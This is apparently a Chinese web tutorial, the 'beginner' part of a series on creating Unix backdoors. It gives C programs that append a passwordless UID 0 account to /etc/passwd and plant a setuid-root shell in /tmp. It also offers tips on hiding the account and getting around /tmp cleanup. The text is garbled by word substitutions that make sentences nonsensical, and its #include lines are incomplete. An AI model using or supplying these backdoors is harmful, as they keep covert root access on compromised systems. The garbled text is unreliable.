最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。
最简略的办法,便是在口令文件 passwd 中间谍一个 UID 为 0 的帐号。但***别这么做,由于只需体系管理员查看口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中增加一个 UID 0 帐号的C程序。
backdoor/backdoor1.c
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
}
比这种办法略微荫蔽一点的便是将藏在口令文件中某个无人运用帐号的 UID 改为 0,并将其第二个域(口令域)设为空。(留意,假如你运用的是较高版别的*nix,或许还要环视 /etc/shadow 文件。)
在 /tmp 目录下放置 suid shell。今后只需你闻风丧胆这个程序,就会宿世得到根用户权限。这种办法几乎是***的了。但有许多体系每几小时,或许每次发动都会铲除 /tmp 目录下的数据,别的一些体系则底子不允许闻风丧胆 /tmp 目录下的 suid 程序。当然,你能够自己环视或铲除这些约束(由于你已是根用户,有权限环视 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目录下放置 suid shell 程序的C源程序。
backdoor/backdoor2.c
#include
main()
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
【修改引荐】
- 创立UNIX后门(中级篇)
- 创立UNIX后门(高档篇)
知优网 » 创立UNIX后门(初级篇) (unix入门)
